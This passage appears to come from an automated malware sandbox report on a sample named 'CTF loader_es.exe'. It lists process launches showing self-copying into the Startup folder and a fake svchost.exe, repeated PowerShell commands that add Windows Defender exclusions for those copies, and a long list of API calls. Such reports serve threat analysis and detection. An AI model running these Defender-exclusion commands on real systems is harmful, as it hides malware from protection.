                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
                                                  Imagebase:0x10b0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:08
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Imagebase:0x2e0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:20:31:08
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:08
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:09
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:14
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Imagebase:0x2e0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:20:31:13
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:13
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe'
                                                  Imagebase:0xb20000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 19%, Metadefender
                                                  • Detection: 45%, ReversingLabs

                                                  General

                                                  Start time:20:31:14
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:15
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:16
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:17
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Disassembly

                                                  Code Analysis


                                                    Executed Functions

                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D4A96
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D4A96
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001D4348
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001D4348
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001D3D86
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001D3D86
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 001D19B8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 001D19B8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170493405.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170493405.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2171042413.00000000002E2000.00000020.00020000.sdmp, Offset: 002E0000, based on PE: true
                                                    • Associated: 00000004.00000002.2171015728.00000000002E0000.00000002.00020000.sdmp
                                                    • Associated: 00000004.00000002.2177070083.0000000000618000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0037AD37
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0037AD37
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0037B329
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0037B329
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 01DB099C
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 01DB01D0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01DB072D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 01DB0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 0037AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 0037BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0037A23E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01DB109E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 0037B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 01DB0819
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01DB0502
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01DB072D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 01DB08E5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0037A94A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 01DB0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 0037BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 0037B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 01DB0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0037AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 01DB1148
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 0037AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0037BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 01DB08E5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01DB132F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 01DB0640
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0037AA71
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0037AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 01DB099C
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 01DB0819
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0037ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0037BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0037A23E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01DB109E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 01DB01D0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01DB132F
